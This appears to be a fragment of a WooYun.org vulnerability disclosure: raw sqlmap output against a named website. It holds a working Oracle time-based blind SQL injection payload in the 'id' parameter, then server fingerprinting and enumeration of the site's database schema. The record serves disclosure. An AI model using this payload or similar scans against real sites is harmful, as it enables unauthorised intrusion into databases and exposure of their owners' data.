WooYun.org

---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=1506003492 AND 1746=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(98)||CHR(118)||CHR(87),5)
---
[17:22:54] [INFO] the back-end DBMS is Oracle
web application technology: Apache 2.2.9, PHP 5.1.6
back-end DBMS: Oracle
[17:22:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[17:22:54] [INFO] fetching database (schema) names
[17:22:54] [INFO] fetching number of databases
[17:22:54] [INFO] retrieved: 
[17:22:54] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[17:22:58] [INFO] adjusting time delay to 2 seconds due to good response times
[17:23:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:23:00] [ERROR] unable to retrieve the number of databases
[17:23:00] [INFO] falling back to current database
[17:23:00] [INFO] fetching current database
[17:23:00] [INFO] retrieved: YC91_COM
[17:24:17] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
available databases [1]:
[*] YC91_COM
[17:24:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yc91.com'